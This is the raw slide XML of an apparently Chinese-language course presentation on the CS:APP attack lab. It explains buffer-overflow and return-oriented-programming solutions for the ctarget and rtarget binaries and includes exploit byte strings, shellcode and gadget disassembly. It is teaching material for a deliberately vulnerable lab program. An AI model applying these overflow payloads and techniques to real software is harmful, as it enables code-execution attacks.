      </p:sp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603C6138-6B94-415A-AC3C-2EEEB6865A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96094" y="6168641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4559B23-A921-4C02-9CE3-D67D06265E02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5452786" y="2653305"/>
            <a:ext cx="3335396" cy="5112561"/>
            <a:chOff x="2866127" y="1988840"/>
            <a:chExt cx="3211867" cy="37444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0BEE79E-3602-4E17-A2CD-72CB86E9CF05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3563888" y="3495936"/>
              <a:ext cx="2514103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A94920-E90B-476A-BEE0-31DF099D127D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3563887" y="1988840"/>
              <a:ext cx="2514106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EDD544A-2EDD-4C53-86BC-2E784D25D28F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2866127" y="3465676"/>
              <a:ext cx="621649" cy="270497"/>
              <a:chOff x="2807626" y="2764264"/>
              <a:chExt cx="621649" cy="270497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75A8DB5-910D-433D-B610-F86EC7594A54}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2807626" y="2764264"/>
                <a:ext cx="621649" cy="27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D728648F-F8D5-4233-ACF9-6A56594E8C25}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2807626" y="3021878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FE41050-6702-4D76-B5AE-14C4D4F9ABEB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3563888" y="3825587"/>
              <a:ext cx="2500229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[39-32]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053F201-B3C7-4CB4-A8BC-61DE624DEFA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3563887" y="4131436"/>
              <a:ext cx="2500228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84353C5-3805-4BD8-9C5D-AB8F228719AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3563887" y="4469444"/>
              <a:ext cx="2514104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F210F27-D34A-4F48-83E8-EEFBA16E8D4A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3563888" y="4795369"/>
              <a:ext cx="2514106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4181FA0-7B18-48A2-B50B-FC02745289F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3577762" y="3480710"/>
              <a:ext cx="250023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40204d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210CD86-0F88-4E4F-9415-557078ECA3DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6141144" y="654790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i="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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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[7-0]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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406C2E-64D6-40A4-9D00-B2B291052281}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6191793" y="4235155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0x20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9D5C3A-7306-4816-8416-8EA590D16364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6191793" y="3787993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41210b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00B0E10-8AB6-4068-A590-2970F0C2181C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6141144" y="1173262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Touch3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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89F1C94-479F-45FD-B555-891B19532AE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6191793" y="3346665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41214a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654C2C6-25F8-4288-A3C0-7A1107AE45F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6191793" y="2958091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4120e0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DAA13CF-C69D-4DD4-B416-8C55DF71FA88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6164351" y="2531988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4120ab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12D34E-1752-4008-BE40-07995065B1D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6191793" y="2117586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412042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0176305-ADDD-4EF2-868F-C1F150C2D0BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6161806" y="1648414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41205f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FE61804-F13E-4171-AA1D-B62F640548B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716016" y="735598"/>
            <a:ext cx="135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rSP+0x20</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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73AAE81-14A4-498B-B0EA-EF963AC2BD66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5576041" y="2781966"/>
            <a:ext cx="52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57028BD-AA00-4119-A44B-37947828DFCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6141144" y="714572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00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookieASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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9D90A65-478E-4317-8CA5-EFE71A939551}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5577289" y="2378234"/>
            <a:ext cx="64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rSP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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4A24CD-146B-4049-B038-ED69231C4CA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5576041" y="1061574"/>
            <a:ext cx="52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41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AEAE4-C5C1-470E-8674-354BA94B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76AB3-12C0-4D25-84AF-B31EE85D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0728"/>
            <a:ext cx="9649072" cy="5040312"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>000000000040203c &lt;setval_426&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  40203c:	f3 0f 1e fa          	endbr64 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  402040:	c7 07 48 89 c7 90    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>   $0x90c78948,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rdi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402046:	c3                   	ret    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0000000000402047 &lt;getval_280&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  402047:	f3 0f 1e fa          	endbr64 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  40204b:	b8 29 58 90 c3      mov    $0xc3905829,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  402050:	c3                   	ret    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686F51-114F-4980-99A2-DF112F9D58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8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ctarget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，造成缓冲区溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转向执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>touch1</a:t>
            </a:r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dirty="0"/>
              <a:t>无符号字节数据，十六进制表示，字节间用空格隔开，如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty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fb 1d 40 00 00 00 00 00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181" y="1268760"/>
            <a:ext cx="3001653" cy="5112568"/>
            <a:chOff x="2915393" y="1988835"/>
            <a:chExt cx="2890485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15393" y="4871857"/>
              <a:ext cx="621649" cy="270497"/>
              <a:chOff x="2856892" y="4170445"/>
              <a:chExt cx="621649" cy="270497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56892" y="4170445"/>
                <a:ext cx="621649" cy="27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884066" y="44325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[39-32]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[07-00]</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="右大括号 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5661862" y="3495931"/>
              <a:ext cx="144016" cy="1625465"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0D71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77763" y="3480710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20" name="右大括号 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5647466" y="1988835"/>
              <a:ext cx="158412" cy="1507093"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrac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209500" y="3266241"/>
            <a:ext cx="652816" cy="2288134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7C64653-CAB3-441A-9228-021A656FB0D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="6411823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000000000401dfb &lt;touch1&gt;:</a:t>
            </a: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CD0ADF54-3764-41FF-93A3-98658797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582612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ctarget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> level1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8BF7B-2B99-48DA-A503-3AAA73B7A6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235ABB-DA4A-4CDC-9605-2B42A3913766}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499267" y="3861048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void touch1()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    vlevel = 1;       /* Part of validation protocol */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    printf("Touch1!: You called touch1()\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    validate(1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    exit(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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52DC2C-CF19-4B86-ACD3-DAD0FD145768}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="126876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/>
              <a:t>unsigned getbuf()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    char buf[BUFFER_SIZE];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    Gets(buf);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    return 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>/* $end getbuf-c */</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92932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ctarget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> level1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ctarget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，造成缓冲区溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转向执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>touch1</a:t>
            </a:r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dirty="0"/>
              <a:t>无符号字节数据，十六进制表示，字节间用空格隔开，如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty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fb 1d 40 00 00 00 00 00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181" y="1268760"/>
            <a:ext cx="3001653" cy="5112568"/>
            <a:chOff x="2915393" y="1988835"/>
            <a:chExt cx="2890485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15393" y="4871857"/>
              <a:ext cx="621649" cy="270497"/>
              <a:chOff x="2856892" y="4170445"/>
              <a:chExt cx="621649" cy="270497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56892" y="4170445"/>
                <a:ext cx="621649" cy="27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884066" y="44325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[39-32]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[07-00]</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="右大括号 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5661862" y="3495931"/>
              <a:ext cx="144016" cy="1625465"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0D71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77763" y="3480710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Touch1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>地址</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="右大括号 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5647466" y="1988835"/>
              <a:ext cx="158412" cy="1507093"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrac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209500" y="3266241"/>
            <a:ext cx="652816" cy="2288134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7C64653-CAB3-441A-9228-021A656FB0D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="6411823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000000000401dfb &lt;touch1&gt;:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="429278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8" y="1025346"/>
            <a:ext cx="8601489" cy="5040312"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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touch2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touch2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数，使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>touch2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数中的判断成功，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B1FD88B-0106-45A5-8CBA-C34754E6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582612"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ctarget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> level2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29EE58-DA39-44FD-AE3C-95FA04D7B3DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250441" y="2735165"/>
            <a:ext cx="8643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void touch2(unsigned val)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    vlevel = 2;       /* Part of validation protocol */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    if (val == cookie) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    printf("Touch2!: You called touch2(0x%.8x)\n", val);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    validate(2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    } else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    printf("Misfire: You called touch2(0x%.8x)\n", val);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>   fail(2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>    exit(0);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13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5" y="980728"/>
            <a:ext cx="5400601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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>movq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> $0x59b997fa,%rdi; ret’ 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 48 c7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> fa 97 b9 59 c3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00 00 00 00 00 00 00 00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/* Address of shellcode */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78 dc 61 55 00 00 00 00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/* Address of touch2 */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2f 1e 40 00 00 00 00 00 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="10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181" y="1268767"/>
            <a:ext cx="3568167" cy="5112561"/>
            <a:chOff x="2915393" y="1988840"/>
            <a:chExt cx="3436017" cy="3744416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514103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7" y="1988840"/>
              <a:ext cx="2514106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15393" y="4871857"/>
              <a:ext cx="621649" cy="270497"/>
              <a:chOff x="2856892" y="4170445"/>
              <a:chExt cx="621649" cy="270497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56892" y="4170445"/>
                <a:ext cx="621649" cy="27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884066" y="44325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500229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[39-32]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7" y="4131436"/>
              <a:ext cx="2500228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7" y="4469444"/>
              <a:ext cx="2514104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514106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c3 55 61 d6 78 c7 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>c7</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> 48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右大括号 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6104836" y="3147105"/>
              <a:ext cx="246574" cy="1959070"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="0D71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77762" y="3480710"/>
              <a:ext cx="250023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rsp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>的值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424001B-4F6E-43EA-9CBF-F62E8BB51418}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705614" y="2850242"/>
            <a:ext cx="2596389" cy="4622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 i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00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Touch2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址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C01559-CCAA-4D8C-9D31-3F9FFB8F5428}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5060400" y="3756485"/>
            <a:ext cx="52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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50491F18-6497-403F-AB47-522894A8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582612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ctarget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> level2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E04B95-2128-46B6-9D6B-B325061B3A96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3777683" y="5185843"/>
            <a:ext cx="157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0x5561dc78</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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0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091AC01-3651-4471-ADE2-967CAE84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1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36034-4C55-4372-96C1-A75E549F3C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EE8E5E-942A-4B9A-94DD-F017547D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05" y="1556792"/>
            <a:ext cx="744959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2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ctarget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> level3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2852936"/>
            <a:ext cx="8136904" cy="367240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touch3(char *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vlevel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3;       /* Part of validation protocol */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hexmatch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(cookie,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("Touch3!: You called touch3(\"%s\")\n",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validate(3);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 else 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touch3(\"%s\")\n",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fail(3);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</p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18792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12911</TotalTime>
  <Words>1406</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>251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黑体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>楷体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>华文细黑</vt:lpstr>
      <vt:lpstr>Cambria Math</vt:lpstr>
      <vt:lpstr>2_nordridesign</vt:lpstr>
      <vt:lpstr>1_nordridesign</vt:lpstr>
      <vt:lpstr>目标程序分析</vt:lpstr>
      <vt:lpstr>任务1：ctarget level1</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>ctarget level1</vt:lpstr>
      <vt:lpstr>ctarget level2</vt:lpstr>
      <vt:lpstr>任务3：ctarget level2</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>任务3：ctarget level3</vt:lpstr>
      <vt:lpstr>任务3：ctarget level3</vt:lpstr>
      <vt:lpstr>任务4： rtarget level2</vt:lpstr>
      <vt:lpstr>任务4： rtarget level2</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>任务4： rtarget level3</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿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chenyanli</cp:lastModifiedBy>
  <cp:revision>1059</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-09-14T03:13:49Z</dcterms:created>
